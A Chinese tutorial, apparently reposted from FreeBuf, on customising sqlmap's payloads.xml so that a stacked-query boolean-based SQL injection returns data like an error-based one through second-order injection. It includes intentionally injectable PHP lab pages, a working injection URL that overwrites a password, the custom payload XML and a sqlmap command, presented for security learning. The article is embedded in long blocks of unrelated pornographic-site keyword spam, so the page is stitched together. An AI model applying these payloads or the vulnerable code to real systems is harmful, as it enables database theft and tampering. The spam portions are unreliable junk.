精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Sqlmap進階:定制payload加速boolean-based注入

安全 數據安全
本文主要向讀者介紹sqlmap的payloads自定義,以及如何基于它們,利用二階注入功能,讓boolean-based注入點轉化成error-based,加速測試過程。

文中提及的部分技術可能帶有一定攻擊性,僅供安全學習和教學用途,禁止非法使用。

大家在玩SQL注入的時候大概都遇到過一種特別雞肋的情況:目標只有支持多語句查詢的boolean-based注入點(比如CVE-2014-3704)。我們很單純地想下載數據庫,卻只能用sqlmap10線程一位一位獲取。這樣的龜速根本就是反人類!那邊跑著sqlmap這邊還不能溜掉,說不定就要你按個“Y”。

不過,既然支持多語句就有另一種思路可以提速:把注入語句的執行結果update到另一個可見頁面上,這樣就可以直接獲取注入語句的輸出了。然而sqlmap本身并沒有這個功能。

Sqlmap進階:定制payload加速boolean-based注入

 

本文主要向讀者介紹sqlmap的payloads自定義,以及如何基于它們,利用二階注入功能,讓boolean-based注入點轉化成error-based,加速測試過程。

實驗環境搭建:

實驗用數據庫是基于sqli靶機環境的

另有兩個php分別作為上圖中的頁面一和頁面二

test.php:

  1. <?php  
  2. function db_connect() {  
  3.     @ $db = new mysqli ( 'localhost''root''********''security' );  
  4.     // echo "out";  
  5.     if (mysqli_connect_errno ()) {  
  6.         echo "Error: Could not connect to database.  Please try again later.";  
  7.         return null;  
  8.     }  
  9.     return $db;  
  10. }  
  11. $db = db_connect ();  
  12. $id=$_GET['id'];  
  13. $query ="SELECT * FROM users WHERE id='$id' ;";  
  14. //echo $query;  
  15. $result = $db->multi_query( $query );  
  16. $result = $db->multi_query( 'select * from SLEEP(5)');  
  17. $result = $db->store_result();  
  18. //echo $num_results = $result->num_rows;  
  19. echo $result->fetch_assoc()['username'];  
  20. //echo $result->fetch_assoc ()['username'];  
  21. $db->close ();  
  22. ?> 

test1.php

  1. <?php  
  2. function db_connect() {  
  3.     @ $db = new mysqli ( 'localhost''root''********''security' );  
  4.     // echo "out";  
  5.     if (mysqli_connect_errno ()) {  
  6.         echo "Error: Could not connect to database.  Please try again later.";  
  7.         return null;  
  8.     }  
  9.     return $db;  
  10. }  
  11. $db = db_connect ();  
  12. $query ="SELECT * FROM users WHERE id='10' ;";  
  13. //echo $query;  
  14. $result = $db->query( $query );  
  15. echo $result->fetch_assoc()['password'];  
  16.  
  17. $db->close ();  
  18. ?> 

顯然test.php存在支持多語句執行的SQL注入漏洞

Sqlmap進階:定制payload加速boolean-based注入

于是我們請求

http://127.0.0.1/sqli/test.php?id=1%27;update%20users%20set%20password%20=%20%27freebuffreebuf%27%20where%20id%20=%20%2710

就成功修改了password字段

Sqlmap進階:定制payload加速boolean-based注入

 

可見這種思路是可行的。

Sqlmap的修改:

首先,我們先了解sqlmap是如何工作的:

sqlmap啟動后首先設置測試的level和risk,并識別受測試元素的類型

然后從它的配置文件xml/payloads.xml里面獲取應該測試的漏洞類型、測試方法以及相應的漏洞利用方案

在payloads.xml里面記錄了兩類數據(如果您聽得云里霧里的,請看看我翻譯的payloads.xml說明):

:用來使sql語句正確的前綴和后綴。比如前綴:"'"和后綴:"AND '[RANDSTR]'='[RANDSTR]"就可以閉合單引號,防止出錯。

:特定漏洞的全部信息,包括所用到的boundary,漏洞的level、risk,漏洞類型,利用的方法,檢測方法等。

在測試一個參數的時候sqlmap會遍歷所有符合要求的test節點,使用request節點下的payload執行漏洞掃描。

最后請求的內容是(括號里只是舉例):

原參數

(id=1)+prefix (')+payload(AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))+comment(注釋符這里沒有)+suffix(AND 'few'='few)

然后再用response節點下的某種檢測方式進行檢測。

這里我們的思路的核心就是輸出明文,與error-based相似,因此使用error-based漏洞常使用的正則表達式進行輸出的獲取:

  1. <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep> 

其中[DELIMITER_START]和[DELIMITER_STOP]是用來匹配輸出開頭和結尾的隨機生成的字符串

想必payload應該與之對應

  1. <payload>;update users set password = CONCAT('[DELIMITER_START]',1,'[DELIMITER_STOP]') where id = </payload> 

這里請注意在error-based漏洞的檢測中sqlmap是用獲取的輸出(即在[DELIMITER_START]和[DELIMITER_STOP]之間的部分)為1來初步確定漏洞的存在的。

上述語句就把輸出的內容UPDATE成了[DELIMITER_START]+"1"+[DELIMITER_STOP]使得此漏洞被檢測出存在。

檢測說完了,說說利用:

利用的語句受vector節點控制,有了payload就可以對照寫出來了

  1. <vector>;update users set password = CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') where id =</vector> 

這里的[QUERY]就是執行的漏洞利用語句,輸出還是會被正則獲取

于是就有了最終的自定義test

  1. <test>  
  2.         <title>MySQL Customized  update query based test </title>  
  3.         <stype>2</stype>  
  4.         <level>1</level>  
  5.         <risk>0</risk>  
  6.         <clause>1</clause>  
  7.         <where>1</where>  
  8.         <vector>;update users set password = CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') where id =</vector>  
  9.         <request>  
  10.             <payload>;update users set password = CONCAT('[DELIMITER_START]',1,'[DELIMITER_STOP]') where id = </payload>  
  11.         </request>  
  12.         <response>  
  13.             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>  
  14.         </response>  
  15.         <details>  
  16.             <dbms>MySQL</dbms>  
  17.             <dbms_version>&gt;= 5.0.11</dbms_version>  
  18.         </details>  
  19.     </test> 

我們把這段代碼加入到payloads.xml里面(root節點里面哦),然后基于這個自定義的測試配置和二階SQL注入,寫我們的命令:

  1. sqlmap -u 127.0.0.1/sqli/test.php?id=1 --second-order test1.php -v 3 --level 1 --suffix "'10" 

請注意上述語句我重定義了后綴。

看看效果:

Sqlmap進階:定制payload加速boolean-based注入

可用了!

至此,我們已經成功讓一個慢得要死的boolean-based注入點進化成為了確確實實人見人愛的error-based注入點,媽媽再也不用注入速度太慢了~

快快dump一下來體會這速度帶來的快感吧。

P.S:多次對比過程中不要忘了刪掉sqlmap的本地緩存。

參考:sqlmap源代碼

本文作者:piece of the past,聯系方式:1005308775@qq.com

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2013-06-27 10:26:53

Sqlmap注入

2013-09-13 09:58:49

2019-07-05 08:12:36

SQLMAPsql注入

2017-05-02 09:02:14

2021-02-28 20:41:18

Vue注入Angular

2011-08-17 16:23:31

iPhone開發UIViewContr

2022-08-30 09:24:47

數據算法

2011-08-17 16:29:12

iPhone開發UIButton

2014-01-07 14:53:37

Android開發依賴注入Roboguice

2009-07-22 15:21:00

iBATIS SQLM

2009-07-22 15:01:01

iBATIS SQLM

2023-05-10 14:57:13

UbuntuChromium

2020-08-18 16:58:17

漏洞網絡安全網絡攻擊

2009-06-29 10:34:49

網站加速Page SpeedGoogle

2014-09-28 14:53:39

滲透BurpSuiteSqlmap

2010-01-21 17:34:48

VB.NET Bool

2018-02-10 09:44:19

點贊
收藏

51CTO技術棧公眾號

国产一区二区三区黄片| 91日韩视频在线观看| 国产女主播喷水视频在线观看 | 亚洲v日本v欧美v久久精品| 国产综合 伊人色| 日本妇乱大交xxxxx| 亚洲欧美综合| 亚洲视频日韩精品| 香蕉视频1024| avav成人| 精品福利在线看| 久久久一二三四| 亚洲日本香蕉视频| 国产精品一二三在| 国产精品精品久久久久久| 国产一级片久久| 久久亚洲精品中文字幕蜜潮电影| 欧美videos大乳护士334| 日韩无套无码精品| 不卡一本毛片| 中文字幕中文字幕一区二区| 蜜桃999成人看片在线观看| 国产黄色高清视频| 久久精品国产网站| 国产suv精品一区二区| 久久久久久久极品内射| 91九色精品| 国产一区二区三区在线播放免费观看| 亚洲视频天天射| 香蕉成人在线| 在线观看欧美日本| 久草精品在线播放| 手机av在线| 亚洲自拍偷拍综合| 自拍偷拍视频在线| 日本在线免费看| 中文一区二区在线观看| 麻豆91蜜桃| 天堂在线观看av| 成人一区在线观看| av一区二区三区四区电影| 国产精品天天操| 麻豆精品一区二区三区| 国产精品爱久久久久久久| 自拍偷拍欧美亚洲| 国产精品亚洲综合久久| 亚州欧美日韩中文视频| 国产亚洲精品久久777777| 欧美一区网站| 久久69精品久久久久久久电影好 | 国产深夜精品福利| 国产精品午夜一区二区| 日韩精品成人一区二区在线| 日本精品视频在线观看| 亚洲成人av影片| 噜噜噜91成人网| 国产成人精品免费久久久久| 欧美精品韩国精品| 麻豆成人精品| 国产精品香蕉在线观看| 亚洲专区第一页| 精品一区二区三区香蕉蜜桃| 成人精品一区二区三区电影免费| 中文字幕一区二区久久人妻| 久久99热国产| 99超碰麻豆| 国产91绿帽单男绿奴| 国产成人av一区| 高清视频一区二区三区| 亚洲日本在线播放| 欧美国产日产图区| 一本一本a久久| 91三级在线| 亚洲成a人片在线观看中文| 国产96在线 | 亚洲| 看黄在线观看| 在线观看亚洲一区| 波多野结衣在线免费观看| av综合网页| 亚洲欧美国产日韩天堂区| 日本欧美一区二区三区不卡视频| 久久精品青草| 久久人人看视频| 99久久久久久久久| 国产精品一区二区你懂的| 精品国产中文字幕| av在线播放免费| 亚洲免费观看视频| 伊人成色综合网| 欧美韩国日本| 精品国产一二三区| 妺妺窝人体色WWW精品| 欧美1区2区| 日韩**中文字幕毛片| 国产精品无码久久av| 91视视频在线直接观看在线看网页在线看| 日本福利一区二区三区| 污片在线免费观看| 色狠狠色狠狠综合| 两女双腿交缠激烈磨豆腐| 你懂的一区二区三区| 久久精品福利视频| 天天干天天干天天| 国产成人自拍网| 色综合电影网| 678在线观看视频| 欧美性猛片xxxx免费看久爱| 黑森林av导航| 久久中文字幕av一区二区不卡| 97福利一区二区| 国产精品久久久久久久久久久久久久久久久久 | 国产高清精品一区| 日本中文字幕在线2020| 欧美性精品220| 黑人无套内谢中国美女| 欧美少妇xxxx| 热re91久久精品国99热蜜臀| www.亚洲黄色| 国产精品女同一区二区三区| av免费观看网| gogo人体一区| 欧美超级免费视 在线| 波多野结衣二区三区| 丁香婷婷综合色啪| 欧美与动交zoz0z| 91p九色成人| 精品亚洲国产视频| 日韩成人av毛片| 国产sm精品调教视频网站| 五月天男人天堂| 电影一区电影二区| 亚洲人在线视频| 99视频在线看| zzijzzij亚洲日本少妇熟睡| 久久综合亚洲精品| 9.1麻豆精品| 日韩中文在线视频| 精品国产青草久久久久96| 久久久蜜桃精品| 日本毛片在线免费观看| 欧美日韩一本| 欧美一级大片在线免费观看| 污污网站在线免费观看| 亚洲成人福利片| 好吊色视频一区二区三区| 欧美日韩国产精品一区二区亚洲| 亚洲iv一区二区三区| 毛片网站在线免费观看| 欧美高清www午色夜在线视频| 国产一级淫片久久久片a级| 日本vs亚洲vs韩国一区三区| 日韩欧美国产二区| 岛国一区二区| 神马久久桃色视频| 91亚洲欧美激情| 一区二区三区高清不卡| 精人妻一区二区三区| 日韩一级免费| 欧美国产综合视频| 欧美aaa大片视频一二区| 国产一区二区久久精品| 怡红院成永久免费人全部视频| 国产精品家庭影院| 亚洲一级片av| 欧美视频导航| 国严精品久久久久久亚洲影视| 中文不卡1区2区3区| 国产一区二区三区三区在线观看 | 国产麻豆91精品| 国内自拍中文字幕| 久久免费视频66| 88xx成人精品| www 日韩| 日韩三级在线观看| 国产精品黄色网| 国产精品三级av| 黄页网站在线看| 香蕉亚洲视频| 制服丝袜综合日韩欧美| 91蜜桃臀久久一区二区| 欧美在线影院在线视频| 中文字幕在线免费| 日韩欧美国产高清| 五月天激情四射| 亚洲欧洲日产国产综合网| 中文字幕无人区二| 视频在线观看91| 少妇高潮大叫好爽喷水| 欧美日韩一区二区三区不卡视频| 国产精品国语对白| 麻豆福利在线观看| 亚洲天堂成人在线| 亚洲精品中文字幕成人片| 色哟哟在线观看一区二区三区| 小早川怜子一区二区的演员表| 成人午夜激情片| 在线观看亚洲色图| 亚洲国产电影| 中文字幕日韩一区二区三区不卡 | 日韩av超清在线观看| 久久av.com| 国产一级在线观看| 精品黑人一区二区三区久久| 亚洲午夜无码久久久久| 亚洲成a人片在线不卡一二三区 | 日本亚洲一区| 日韩女优av电影| 国产欧美久久一区二区| 日漫免费在线观看网站| 7777精品伊人久久久大香线蕉超级流畅| 五月婷婷激情网| 亚洲乱码中文字幕综合| 久久精品国产亚洲av麻豆| 国产高清不卡一区二区| 午夜两性免费视频| 欧美一级二区| 丰满少妇久久久| 亚洲精品成人影院| 亚洲黄色一区二区三区| 天堂成人娱乐在线视频免费播放网站 | 欧美精品乱码视频一二专区| 国产女人18毛片水真多成人如厕 | 亚洲精品一二三四| 久久国产精品99久久人人澡| 久久人妻精品白浆国产| 亚洲精品欧洲| 韩日视频在线观看| 午夜精品视频| 香蕉视频在线网址| 成人影视亚洲图片在线| 欧美日韩国产高清视频| 日韩高清影视在线观看| 国产一区喷水| 国产无遮挡裸体免费久久| 99在线免费观看视频| 久久久久久久久久久久电影| 国产精品中文字幕在线| 91天天综合| 国产精品美女久久久久av超清| gay欧美网站| 日韩av片免费在线观看| jizz内谢中国亚洲jizz| 4438全国成人免费| 依依综合在线| 国产精品久久久久久久久借妻| 波多视频一区| 国产精品国产亚洲伊人久久| 韩日精品一区| 成人黄色av播放免费| 欧美日韩视频免费看| 91精品久久久久| 精品国产一区二区三区2021| 不卡视频一区| 中文无码日韩欧| 国产精品久久久久久久小唯西川| jizz18欧美18| 蜜桃麻豆91| 精品久久精品| 在线免费一区| 激情综合视频| 日韩在线一级片| 久色成人在线| 亚洲午夜激情影院| 国产精品一品二品| 粉嫩av懂色av蜜臀av分享| 久久亚洲二区三区| 大胸美女被爆操| 中文字幕亚洲一区二区av在线| 登山的目的在线| 香港成人在线视频| 中文字幕手机在线视频| 欧美浪妇xxxx高跟鞋交| 亚洲黄色精品视频| 精品亚洲夜色av98在线观看| 国产成人天天5g影院在线观看| 久久精品国产欧美激情| 国产精品偷拍| 国产激情999| 国产一区二区三区亚洲综合| 国产麻豆乱码精品一区二区三区 | 亚洲人成电影网站色…| 男女啪啪在线观看| 久久久久久亚洲精品| 日韩高清中文字幕一区二区| 91最新在线免费观看| 欧美激情99| 懂色av一区二区三区四区五区| 亚洲大胆av| 五月天亚洲视频| 国产成人午夜视频| 四虎国产精品成人免费入口| 一区二区三区欧美日| 亚洲s码欧洲m码国产av| 日韩一级黄色片| 免费人成在线观看网站| 久久91精品国产91久久跳| 亚洲成人不卡| 成人羞羞视频免费| 99久久.com| 国产男女无遮挡| 国产精品影视网| 亚洲一级片在线播放| 亚洲成av人影院在线观看网| 国产一区二区三区四区视频| 亚洲美女在线看| 黄网av在线| 91免费的视频在线播放| 在线观看欧美理论a影院| 美女黄色免费看| 国产原创一区二区三区| 老熟妇一区二区| 午夜成人免费电影| 国产三级三级在线观看| 中文字幕日韩欧美| 玛雅亚洲电影| 国产伦精品一区二区三区视频免费| 我不卡神马影院| 亚洲天堂2018av| 国产三级一区二区三区| 国产区在线观看视频| 亚洲精品在线观| 最新日本在线观看| 成人黄色av免费在线观看| 欧美丝袜丝交足nylons172| 欧美丰满熟妇bbbbbb百度| 国产suv一区二区三区88区| 欧洲第一无人区观看| 欧美日韩电影一区| av网页在线| 国产精品亚洲第一区| 日韩精品2区| 欧美伦理片在线观看| 久久精品夜色噜噜亚洲a∨| 69成人免费视频| 亚洲欧美日韩天堂一区二区| 日韩欧美精品一区二区三区| 国产女主播一区二区| 在线观看不卡| 在线免费看黄色片| 午夜在线电影亚洲一区| 天天操天天射天天| 91精品国产高清| 色哟哟精品丝袜一区二区| 免费看又黄又无码的网站| 96av麻豆蜜桃一区二区| 亚洲第一在线播放| 亚洲另类图片色| 欧美大电影免费观看| 午夜精品一区二区在线观看| 日本亚洲最大的色成网站www| 18精品爽国产三级网站| 欧美色大人视频| 日本a在线播放| 91视频网页| 一区二区三区国产在线| a级在线观看视频| 欧美性感一区二区三区| 午夜激情在线观看| 亚洲综合第一页| 禁久久精品乱码| 亚洲国产精品成人综合久久久| 欧美日韩国产精品一区| 成人高潮成人免费观看| 国产在线精品成人一区二区三区| 在线国产一区| 天堂www中文在线资源| 日韩欧美亚洲成人| 嫩草在线视频| 国产精品美女xx| 亚洲永久免费精品| 在线观看日本黄色| 91精品国产综合久久福利软件| a'aaa级片在线观看| 欧美亚洲国产免费| 国产制服丝袜一区| 一级aaa毛片| 在线精品视频视频中文字幕| 激情综合五月| av免费中文字幕| 日韩美女视频19| 日本又骚又刺激的视频在线观看| 国产精品久久久久久av下载红粉| 在线一区免费| 青青草福利视频| 日韩一区二区三区视频在线| 极品在线视频| 制服国产精品| 久久综合九色综合欧美亚洲| 国产三级漂亮女教师| 日本精品视频在线播放| 综合精品一区| 亚洲黄色免费视频| 欧美大片顶级少妇| 99久久伊人| 国自产拍偷拍精品啪啪一区二区| 国产精品午夜在线| 天堂av在线7| 97se亚洲综合| 日本不卡高清视频| 伊人久久综合视频|